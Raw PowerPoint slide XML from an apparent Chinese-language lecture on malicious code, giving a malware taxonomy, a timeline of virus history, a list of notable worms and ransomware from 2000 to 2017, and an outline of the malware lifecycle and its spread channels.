                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0FB51DB-CF87-69C3-3B72-9114BE2BFB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4517664" y="4820836"/>
            <a:ext cx="1447800" cy="666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文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69BADF21-E678-6893-379D-52EC86B6C117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582012" y="4969545"/>
            <a:ext cx="1338828" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特洛伊木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="圆角矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99272197-8161-2142-7FD4-141AAA2A3559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8702945" y="4969545"/>
            <a:ext cx="1781150" cy="666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文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78CC167-4489-6723-8216-FD25B6B85FC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872847" y="5114320"/>
            <a:ext cx="1611248" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拒绝服务程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="圆角矩形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48CF3DDE-2BB1-5E03-10BD-8C56F2059B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8591491" y="2449638"/>
            <a:ext cx="2004058" cy="6667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文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0467D276-FA10-68A9-9A3C-C3C4970537C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8688194" y="2613721"/>
            <a:ext cx="1834156" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>独立于主机程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="直线连接符 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA4680E-FA43-1D6F-38CD-169A000C9D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4476818" y="1882739"/>
            <a:ext cx="1954740" cy="6271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C67E18F1-8C17-1C9E-08FB-1B7333BF9C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9593520" y="3116388"/>
            <a:ext cx="886333" cy="37251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EA11DCB7-A40F-EFB2-FFB3-2CF8B1B4BFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3001060" y="3116388"/>
            <a:ext cx="1475758" cy="4555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4E269C46-1CCF-1FEE-52DA-7950AD574369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3150603" y="3116388"/>
            <a:ext cx="1326215" cy="17044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5371A346-557B-2062-E1D4-759B7F1F9C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4476818" y="3116388"/>
            <a:ext cx="764746" cy="17044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4DD578F7-A436-3343-C394-12CE8068EE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9593520" y="3116388"/>
            <a:ext cx="0" cy="18531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直线连接符 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E9D76F-7792-2752-2486-B1E448863287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8734388" y="3116388"/>
            <a:ext cx="859132" cy="3818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58D22C70-8DC2-7F59-09E0-00B9B64E6FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6431558" y="1882739"/>
            <a:ext cx="3161962" cy="5668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50624" name="直线连接符 1050623">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083EDC60-4856-9DF6-E8E3-BECD6911D234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4503499" y="3148334"/>
            <a:ext cx="1049258" cy="51330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50634"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="105063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50631"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="105063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50633"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1050633"/>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050632"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1050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631" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="105063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8495" y="908685"/>
            <a:ext cx="10263505" cy="5367020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蕴育生命（1960-1970）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1960年，美国的约翰·康维编写了一个“生命游戏”程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>峥嵘出现（1980）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1983年真正的计算机病毒被提出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>两军对垒（1988-1990）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大量出现，首次大规模破坏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>魔高一尺（1992）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>出现多态性计算机病毒及其变形病毒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>道高一丈（1992-1995）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>微软Windows 95操作系统出现，DOS病毒无用武之地</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>死灰复燃（1995-1997）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 95采用的技术也逐渐被病毒编写者掌握</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新的高峰（1997）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Office系列软件出现，产生了很多宏病毒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>巅峰之作（1998）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>出现了一个有史以来最危险、最具破坏力的病毒CIH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>风云再起（2000年至今）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>互联网的快速发展和广泛应用给病毒的发展带来了更广阔的舞台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>永不结束的战争。。。。。。。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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55651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恶意代码发展史</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14880" y="908685"/>
            <a:ext cx="9630410" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2000年——love Bug（VBScript），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>爱虫病毒（邮件主题：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>I LOVE YOU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2001年——Code Red-worm（overflow for IIS），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>红色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2001年——Nimda-worm（IIS/outlook/file share etc.）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2002年——setiri后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2002年——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL slammer（sqlserver）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2003年——hudan的steganography工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2003年——MSBlaster/Nachi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2004年——MyDoom/Sasser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2006年——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>熊猫烧香</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2006年——Leap-A/Oompa-A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2007年——机器狗病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2010年——Stuxnet（工业蠕虫），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>震网病毒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2012年——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>火焰病毒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2017年——WannaCry，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索病毒</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80314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恶意代码陈列</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——2000</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年以后</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927860" y="2108200"/>
            <a:ext cx="9760585" cy="4190365"/>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熊猫烧香病毒</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1996440" y="968375"/>
            <a:ext cx="9624060" cy="953135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t>2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>年熊猫烧香爆发，在短时间内感染全球大量计算机，受害主机的可执行文件的图标都被改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>熊猫举着三根香</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>的模样。</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恶意代码生命周期</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="964565"/>
            <a:ext cx="9647555" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>恶意代码的生命周期：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编制代码、传播、感染、触发、运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、传播机制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a)文件流动</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b)网页脚本和插件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c)电子邮件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d)数字内容播放</a:t>
            </a:r>
            <a:r>
